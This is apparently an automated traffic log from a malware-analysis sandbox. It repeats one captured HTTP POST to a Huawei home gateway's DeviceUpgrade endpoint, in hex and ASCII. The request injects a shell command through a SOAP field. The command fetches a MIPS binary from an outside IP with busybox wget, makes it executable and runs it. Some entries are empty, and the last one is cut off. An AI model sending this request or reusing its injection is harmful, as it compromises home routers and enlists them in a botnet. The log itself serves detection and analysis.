Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 34 2e 38 37 2e 34 32 2e 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 41 6e 74 69 5f 42 69 6e 73 2f 41 6e 74 69 73 6f 63 69 61 6c 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 194.87.42.3 -l /tmp/binary -r /Anti_Bins/Antisocial.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 34 2e 38 37 2e 34 32 2e 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 41 6e 74 69 5f 42 69 6e 73 2f 41 6e 74 69 73 6f 63 69 61 6c 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 194.87.42.3 -l /tmp/binary -r /Anti_Bins/Antisocial.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 34 2e 38 37 2e 34 32 2e 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 41 6e 74 69 5f 42 69 6e 73 2f 41 6e 74 69 73 6f 63 69 61 6c 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 194.87.42.3 -l /tmp/binary -r /Anti_Bins/Antisocial.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 34 2e 38 37 2e 34 32 2e 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 41 6e 74 69 5f 42 69 6e 73 2f 41 6e 74 69 73 6f 63 69 61 6c 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 194.87.42.3 -l /tmp/binary -r /Anti_Bins/Antisocial.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 34 2e 38 37 2e 34 32 2e 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 41 6e 74 69 5f 42 69 6e 73 2f 41 6e 74 69 73 6f 63 69 61 6c 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 194.87.42.3 -l /tmp/binary -r /Anti_Bins/Antisocial.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 34 2e 38 37 2e 34 32 2e 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 41 6e 74 69 5f 42 69 6e 73 2f 41 6e 74 69 73 6f 63 69 61 6c 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 194.87.42.3 -l /tmp/binary -r /Anti_Bins/Antisocial.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POSTData Raw: Data Ascii:
Source: global traffic	HTTP traffic detected: POSTData Raw: Data Ascii:
Source: global traffic	HTTP traffic detected: POSTData Raw: Data Ascii:
Source: global traffic	HTTP traffic detected: POSTData Raw: Data Ascii:
Source: global traffic	HTTP traffic detected: POSTData Raw: Data Ascii:
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 34 2e 38 37 2e 34 32 2e 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 41 6e 74 69 5f 42 69 6e 73 2f 41 6e 74 69 73 6f 63 69 61 6c 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 194.87.42.3 -l /tmp/binary -r /Anti_Bins/Antisocial.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POSTData Raw: Data Ascii:
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 34 2e 38 37 2e 34 32 2e 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 41 6e 74 69 5f 42 69 6e 73 2f 41 6e 74 69 73 6f 63 69 61 6c 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 194.87.42.3 -l /tmp/binary -r /Anti_Bins/Antisocial.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POSTData Raw: Data Ascii:
Source: global traffic	HTTP traffic detected: POSTData Raw: Data Ascii:
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 34 2e 38 37 2e 34 32 2e 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 41 6e 74 69 5f 42 69 6e 73 2f 41 6e 74 69 73 6f 63 69 61 6c 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 194.87.42.3 -l /tmp/binary -r /Anti_Bins/Antisocial.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary 